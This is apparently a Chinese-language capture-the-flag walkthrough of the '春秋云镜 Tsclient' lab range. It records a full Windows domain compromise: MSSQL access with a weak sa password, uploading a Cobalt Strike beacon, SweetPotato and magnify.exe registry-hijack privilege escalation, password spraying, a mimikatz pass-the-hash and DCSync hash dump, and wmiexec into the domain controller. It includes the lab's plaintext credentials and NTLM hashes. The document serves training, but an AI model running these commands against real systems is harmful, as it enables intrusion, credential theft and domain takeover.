春秋云镜-Tsclient

信息收集

fscan

发现存在mssql服务，而且爆出来了密码

Flag01

mssql文件上传+getshell+提权

利用impacket-mssqlclient进行连接

impacket-mssqlclient sa:'1qaz!QAZ'@121.89.199.183

发现设置关闭了xp_cmdshell

从网上下载一下MUDT

和impacket-mssqlclient差不多，但是可以上传文件，上传一个CS上线马

之后利用MDUT上传我们的CS马

成功上线

发现权限很低

之后利用sweetpotato进行提权

将exe利用MDUT上传

shell c:\\users\\public\\sweetpotato.exe -a whoami

之后再以最高权限运行CS马

shell C:\\Users\\Public\\SweetPotato.exe -a C:\\Users\\Public\\beacon_x64.exe

之后找到flag01

flag{f61edeff-5177-40cb-b8fd-4490a483f0df}

Flag02

根据flag01的提示，需要看一下user session

在这台机子里面进行信息收集

查看所有用户

shell net user

hashdump

查看在线用户

shell quser || qwinst

所以我们需要上线John用户，可以利用CS的插件进行查看文件以及进程

选择User为John的进程，之后注入即可

net use可以将远端的共享资源挂载到本地

shell net use

shell type \\TSCLIENT\C\credential.txt

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

现在已经知道远控的账号密码了，现在进行信息收集，获得拓扑图

对入口的机器利用fscan进行收集

先看一下ip

shell ipconfig

之后利用fscan开扫

shell C:\\Users\\Public\\fscan.exe -h 172.22.8.0/24

(icmp) Target '172.22.8.31' is alive
(icmp) Target '172.22.8.15' is alive
(icmp) Target '172.22.8.18' is alive
(icmp) Target '172.22.8.46' is alive
icmp alive hosts len is: 4
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.18:445 open
172.22.8.15:445 open
172.22.8.31:445 open
172.22.8.46:135 open
172.22.8.46:139 open
172.22.8.18:139 open
172.22.8.15:139 open
172.22.8.31:139 open
172.22.8.18:135 open
172.22.8.15:135 open
172.22.8.31:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
alive ports len is: 16
start vulscan
[*] 172.22.8.31          XIAORANG\WIN19-CLIENT      
[*] 172.22.8.15    [+]DC XIAORANG\DC01              
[*] WebTitle:http://172.22.8.18        code:200 len:703    title:IIS Windows Server
NetInfo:
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:3c9d:2e4a:d89d:b62b
NetInfo:
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
NetInfo:
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
NetInfo:
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] 172.22.8.46          XIAORANG\WIN2016           Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[+] mssql:172.22.8.18:1433:sa 1qaz!QAZ

之后利用CS做一个代理，我这里用的socks4，socks5需要身份验证，用的不太习惯

由于我们前面获取了一台主机的账号密码，但是不知道是哪一台机子，利用cme进行密码喷射

proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

发现是可以登录172.22.8.46这台主机的，但是提示STATUS_PASSWORD_EXPIRED

也就是密码过期了，需要使用 smbpasswd进行修改密码

proxychains -q python3 impacket-master/examples/smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'csy666zz!'

之后把proxyfier的配置换为socks4，之后远程连接即可

利用CS生成一个x64exe，直接运行，发现并没有上线，发现机器是不出网的

这个时候就要利用CS的转发上线了

生成一个监听器

之后利用这个监听器生成exe，在不出网的机子运行即可转发上线

根据之前的提示映像劫持提权

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

发现NT AUTHORITY\Authenticated Users可以修改注册表
即所有账号密码登录的用户都可以修改注册表，利用这个性质，修改注册表，使用放大镜进行提权!

修改注册表映像劫持，将放大镜劫持为cmd

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

之后锁定计算机，利用放大镜进行提权

可以发现成功劫持到cmd，看一下权限

确实是最高权限，之后继续运行一下我们的CS马

之后得到flag2

flag{25e1588d-28a6-4269-8fab-aa0a0202ea24}

Flag03

拿下了域控之后，抓一下明文密码，利用CS插件就行

但是没有管理员的hash

查看当前域中的用户

域管用户信息收集

shell net group "domain admins" /domain

发现win2016$在域管组里，即机器账户可以Hash传递登录域控。

利用mimikatz注入机器账户的hash

shell C:\Users\Aldrich\Desktop\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b1b840a5c19c4290a284204df50126a6" "exit"

利用mimikatz dcsync dump域控hash

shell C:\Users\Aldrich\Desktop\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

得到Administrator的hash

2c9d81bdcf3ec8b1def10328a7cc2f08

proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:2c9d81bdcf3ec8b1def10328a7cc2f08 Administrator@172.22.8.15

flag{51a7b5a1-da5c-4198-9dcc-d2a52699af6c}